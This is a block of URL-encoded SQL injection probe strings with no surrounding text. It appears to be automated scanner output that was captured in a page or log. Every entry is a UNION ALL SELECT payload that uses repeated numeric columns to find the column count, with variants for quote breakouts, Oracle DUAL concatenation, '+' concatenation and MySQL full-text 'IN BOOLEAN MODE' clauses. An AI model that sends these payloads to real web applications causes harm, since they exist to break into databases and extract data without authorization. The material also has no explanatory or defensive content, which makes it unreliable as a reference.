-8203%22%20WHERE%205057%3D5057%20UNION%20ALL%20SELECT%205057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057--%20 -9367%20WHERE%204849%3D4849%20UNION%20ALL%20SELECT%204849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849--%20 -9344%20WHERE%205062%3D5062%20UNION%20ALL%20SELECT%205062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062%2C5062--%20 -4228%20WHERE%207027%3D7027%20UNION%20ALL%20SELECT%207027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027--%20 -6840%20WHERE%209692%3D9692%20UNION%20ALL%20SELECT%209692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692%2C9692--%20 -2063%20WHERE%202114%3D2114%20UNION%20ALL%20SELECT%202114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114--%20 -5718%20WHERE%205346%3D5346%20UNION%20ALL%20SELECT%205346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346--%20 -7979%20WHERE%202254%3D2254%20UNION%20ALL%20SELECT%202254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254--%20 -3996%20WHERE%202860%3D2860%20UNION%20ALL%20SELECT%202860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860--%20 -3319%20WHERE%203699%3D3699%20UNION%20ALL%20SELECT%203699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699--%20 -5920%20WHERE%208030%3D8030%20UNION%20ALL%20SELECT%208030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030%2C8030--%20 -1653%27%7C%7C%28SELECT%20%27TrRk%27%20FROM%20DUAL%20WHERE%203266%3D3266%20UNION%20ALL%20SELECT%203266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266--%20 -8861%27%7C%7C%28SELECT%20%27iPto%27%20FROM%20DUAL%20WHERE%203246%3D3246%20UNION%20ALL%20SELECT%203246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246--%20 -5307%27%7C%7C%28SELECT%20%27ksVI%27%20FROM%20DUAL%20WHERE%205409%3D5409%20UNION%20ALL%20SELECT%205409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409--%20 -2445%27%7C%7C%28SELECT%20%27QKel%27%20FROM%20DUAL%20WHERE%209670%3D9670%20UNION%20ALL%20SELECT%209670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670--%20 -1459%27%7C%7C%28SELECT%20%27etBl%27%20FROM%20DUAL%20WHERE%201714%3D1714%20UNION%20ALL%20SELECT%201714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714--%20 -4745%27%7C%7C%28SELECT%20%27XpiO%27%20FROM%20DUAL%20WHERE%201752%3D1752%20UNION%20ALL%20SELECT%201752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752%2C1752--%20 -8031%27%7C%7C%28SELECT%20%27IVII%27%20FROM%20DUAL%20WHERE%204174%3D4174%20UNION%20ALL%20SELECT%204174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174--%20 -2445%27%7C%7C%28SELECT%20%27CbAG%27%20FROM%20DUAL%20WHERE%208347%3D8347%20UNION%20ALL%20SELECT%208347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347--%20 -6535%27%7C%7C%28SELECT%20%27ZcGp%27%20FROM%20DUAL%20WHERE%203040%3D3040%20UNION%20ALL%20SELECT%203040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040%2C3040--%20 -1858%27%7C%7C%28SELECT%20%27aTBL%27%20FROM%20DUAL%20WHERE%204276%3D4276%20UNION%20ALL%20SELECT%204276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276--%20 -8568%27%7C%7C%28SELECT%20%27uYCe%27%20WHERE%208667%3D8667%20UNION%20ALL%20SELECT%208667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667--%20 -4623%27%7C%7C%28SELECT%20%27CSqq%27%20WHERE%205459%3D5459%20UNION%20ALL%20SELECT%205459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459%2C5459--%20 -2538%27%7C%7C%28SELECT%20%27kPTE%27%20WHERE%207577%3D7577%20UNION%20ALL%20SELECT%207577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577%2C7577--%20 -1606%27%7C%7C%28SELECT%20%27jRqv%27%20WHERE%206292%3D6292%20UNION%20ALL%20SELECT%206292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292--%20 -2629%27%7C%7C%28SELECT%20%27jXZc%27%20WHERE%206011%3D6011%20UNION%20ALL%20SELECT%206011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011--%20 -1108%27%7C%7C%28SELECT%20%27Rint%27%20WHERE%209011%3D9011%20UNION%20ALL%20SELECT%209011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011--%20 -9004%27%7C%7C%28SELECT%20%27HPXX%27%20WHERE%204410%3D4410%20UNION%20ALL%20SELECT%204410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410%2C4410--%20 -9791%27%7C%7C%28SELECT%20%27bjSR%27%20WHERE%207212%3D7212%20UNION%20ALL%20SELECT%207212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212%2C7212--%20 -3559%27%7C%7C%28SELECT%20%27KPoe%27%20WHERE%201308%3D1308%20UNION%20ALL%20SELECT%201308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308--%20 -7068%27%7C%7C%28SELECT%20%27DaIk%27%20WHERE%208527%3D8527%20UNION%20ALL%20SELECT%208527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527--%20 -9003%27%2B%28SELECT%20Abzx%20WHERE%208770%3D8770%20UNION%20ALL%20SELECT%208770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770--%20 -6661%27%2B%28SELECT%20XCDP%20WHERE%205642%3D5642%20UNION%20ALL%20SELECT%205642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642--%20 -9262%27%2B%28SELECT%20Azyb%20WHERE%204493%3D4493%20UNION%20ALL%20SELECT%204493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493%2C4493--%20 -7747%27%2B%28SELECT%20JIFA%20WHERE%206198%3D6198%20UNION%20ALL%20SELECT%206198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198%2C6198--%20 -4038%27%2B%28SELECT%20Pzvx%20WHERE%206316%3D6316%20UNION%20ALL%20SELECT%206316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316--%20 -1795%27%2B%28SELECT%20lQVn%20WHERE%206628%3D6628%20UNION%20ALL%20SELECT%206628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628--%20 -4564%27%2B%28SELECT%20ynWE%20WHERE%201423%3D1423%20UNION%20ALL%20SELECT%201423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423--%20 -1623%27%2B%28SELECT%20GZWT%20WHERE%201275%3D1275%20UNION%20ALL%20SELECT%201275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275--%20 -3018%27%2B%28SELECT%20ZpZr%20WHERE%202780%3D2780%20UNION%20ALL%20SELECT%202780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780--%20 -8964%27%2B%28SELECT%20LuRg%20WHERE%209133%3D9133%20UNION%20ALL%20SELECT%209133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133%2C9133--%20 -2814%27%2B%28SELECT%20%27Dwvr%27%20WHERE%201151%3D1151%20UNION%20ALL%20SELECT%201151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151--%20 -7972%27%2B%28SELECT%20%27BGDC%27%20WHERE%208091%3D8091%20UNION%20ALL%20SELECT%208091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091%2C8091--%20 -6790%27%2B%28SELECT%20%27NeWg%27%20WHERE%209242%3D9242%20UNION%20ALL%20SELECT%209242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242%2C9242--%20 -5727%27%2B%28SELECT%20%27RCEU%27%20WHERE%207753%3D7753%20UNION%20ALL%20SELECT%207753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753%2C7753--%20 -6059%27%2B%28SELECT%20%27IoeA%27%20WHERE%207661%3D7661%20UNION%20ALL%20SELECT%207661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661%2C7661--%20 -8872%27%2B%28SELECT%20%27xOjq%27%20WHERE%201994%3D1994%20UNION%20ALL%20SELECT%201994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994--%20 -5852%27%2B%28SELECT%20%27Nici%27%20WHERE%201856%3D1856%20UNION%20ALL%20SELECT%201856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856--%20 -7923%27%2B%28SELECT%20%27BGzr%27%20WHERE%205159%3D5159%20UNION%20ALL%20SELECT%205159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159--%20 -8953%27%2B%28SELECT%20%27pGVq%27%20WHERE%208903%3D8903%20UNION%20ALL%20SELECT%208903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903--%20 -5875%27%2B%28SELECT%20%27yCgd%27%20WHERE%204071%3D4071%20UNION%20ALL%20SELECT%204071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071%2C4071--%20 -5644%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690--%20 -2833%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975--%20 